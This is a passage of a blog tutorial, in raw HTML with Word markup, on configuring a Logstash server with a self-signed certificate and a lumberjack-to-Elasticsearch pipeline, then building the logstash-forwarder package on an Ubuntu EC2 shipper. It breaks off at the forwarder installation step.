<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b>Now Generate the Self signed certs</b></span><span style="font-family: "courier";">:</span></div>
</div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #0e0e0e;">cd /etc/pki/tls; sudo openssl req
-x509 -batch -nodes -newkey rsa:2048 -keyout private/logstash-forwarder.key
-out certs/logstash-forwarder.crt</span><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="color: #0e0e0e; font-family: "verdana" , sans-serif;">The same certificate
"logstash-forwarder.crt” has to be imported to logstash_forwader server
(EC2_A). Please do this using appropriate “scp” commands.</span><span style="font-family: "courier new" , "courier" , monospace;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="color: #0e0e0e; font-family: "verdana" , sans-serif;"><b><br /></b></span>
<span style="color: #0e0e0e; font-family: "verdana" , sans-serif;"><b>Configure Logstash:</b></span><span style="font-family: "courier new" , "courier" , monospace;"><o:p></o:p></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;">nano ~/</span><span style="font-family: "courier new" , "courier" , monospace;">logstash-1.4.2/logstash.conf</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Revision>0</o:Revision>
<o:TotalTime>0</o:TotalTime>
<o:Pages>1</o:Pages>
<o:Words>65</o:Words>
<o:Characters>372</o:Characters>
<o:Company>flipkart</o:Company>
<o:Lines>3</o:Lines>
<o:Paragraphs>1</o:Paragraphs>
<o:CharactersWithSpaces>436</o:CharactersWithSpaces>
<o:Version>14.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>JA</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
<w:UseFELayout/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Cambria;
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
<!--StartFragment-->
<br />
<div class="MsoNormal">
<span style="font-family: "courier";">input {<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> lumberjack {<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> port
=> 5000<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> type
=> "apache-access"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";">
ssl_certificate => "/etc/pki/tls/certs/logstash- forwarder.crt"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> ssl_key
=> "/etc/pki/tls/private/logstash-forwarder.key" <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";">}<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";">}<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";">filter {<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> grok {<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> type
=> "apache-access"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> pattern
=> "%{COMBINEDAPACHELOG}"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> }<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";">}<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";">output { <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> elasticsearch
{<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> host => localhost<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> protocol => http<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> index =>
“apache"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> cluster =>
"elasticsearch"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> index_type =>
"apache"<o:p></o:p></span></div>
<!--EndFragment--><br />
<div class="MsoNormal">
<span style="font-family: "courier";"> }
}<o:p></o:p></span></div>
</div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">This
creates a configuration file which will make the log stash listen on port 5000
(lumberjack) and accept incoming logs from the logstash forwarder. Also, the
grok filter here I have specified as %{COMBINEDAPACHELOG} since we
will be sending the apache access logs from the EC2_A server.</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b>Now setting up our EC2_A server
(Logstash_Forwader/Shipper):</b></span><br />
<span style="font-family: "verdana" , sans-serif;"><b><br /></b></span>
<span style="font-family: "verdana" , sans-serif;"><b>EC2_A</b>:</span><span style="font-family: "courier new" , "courier" , monospace;"> (Micro instance) <span style="background-color: white; color: #444444; font-weight: bold; line-height: 18.200000762939453px;">Ubuntu Server 14.04_64bit: </span>Linux ip-192.168.2.1 3.13.0-29-generic #53-Ubuntu SMP Wed Jun 4 21:00:20 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">Make
sure your Apace Server in running on this machine and java is also installed, or please refer to the first step.</span><span style="font-family: "verdana" , sans-serif;">This machine will be used as a shipper to send
apache logs to EC2_B.</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #0e0e0e;"> </span>wget <span style="color: #0000e9;"><a href="https://github.com/elasticsearch/logstash-forwarder/archive/master.zip">https://github.com/elasticsearch/logstash-forwarder/archive/master.zip</a></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ unzip logstash-forwarder-master.zip<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ </span><span style="font-family: "courier new" , "courier" , monospace;">cd </span><span style="font-family: "courier new" , "courier" , monospace;">logstash-forwarder-master</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b>Installing the developer tools:</b></span><span style="font-family: "courier new" , "courier" , monospace;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ </span><span style="font-family: "courier new" , "courier" , monospace;">sudo apt-get install build-essential<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b><br /></b></span>
<span style="font-family: "verdana" , sans-serif;"><b>Installing Go:</b></span><span style="font-family: "courier new" , "courier" , monospace;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ </span><span style="font-family: "courier new" , "courier" , monospace;">sudo apt-get install python-software-properties<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ sudo apt-add-repository ppa:duh/golang<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ sudo apt-get update<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ sudo apt-get install golang<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ </span><span style="font-family: "courier new" , "courier" , monospace;">sudo apt-get install ruby rubygems ruby-dev<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ </span><span style="font-family: "courier new" , "courier" , monospace;">sudo gem install fpm<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b>Creating the forwarder deb
package.</b></span><span style="font-family: "courier new" , "courier" , monospace;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ </span><span style="font-family: "courier new" , "courier" , monospace;">umask </span><span style="font-family: "courier new" , "courier" , monospace;">022</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ make deb<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">You'll see a long sequence of compilation and then
some final execution as the </span><span style="font-family: "courier new" , "courier" , monospace;">fpm </span><span style="font-family: "courier new" , "courier" , monospace;">command runs and creates the DEB package.</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">Listing 1.34: </span><span style="font-family: "courier new" , "courier" , monospace;">Forwarder make output</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilaQaxefzVRM0xjqwPY8W2Co9e38Rk9NsJdfm-cIQgnTapUKiR7Js2r_GaWa4dS9X2ndXJ6JQ1ZAAwAFgufHDbdi-6VazfmS0sMboqPsMCA5HMtTkQmryFrDc1ZF2uptk_DSf0LJYkqV8/s1600/Screen+Shot+2014-07-27+at+6.19.01+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilaQaxefzVRM0xjqwPY8W2Co9e38Rk9NsJdfm-cIQgnTapUKiR7Js2r_GaWa4dS9X2ndXJ6JQ1ZAAwAFgufHDbdi-6VazfmS0sMboqPsMCA5HMtTkQmryFrDc1ZF2uptk_DSf0LJYkqV8/s1600/Screen+Shot+2014-07-27+at+6.19.01+pm.png" width="640" /></a></div>
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b>Installing the forwarder:</b></span><span style="font-family: "times"; mso-bidi-font-family: Times;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
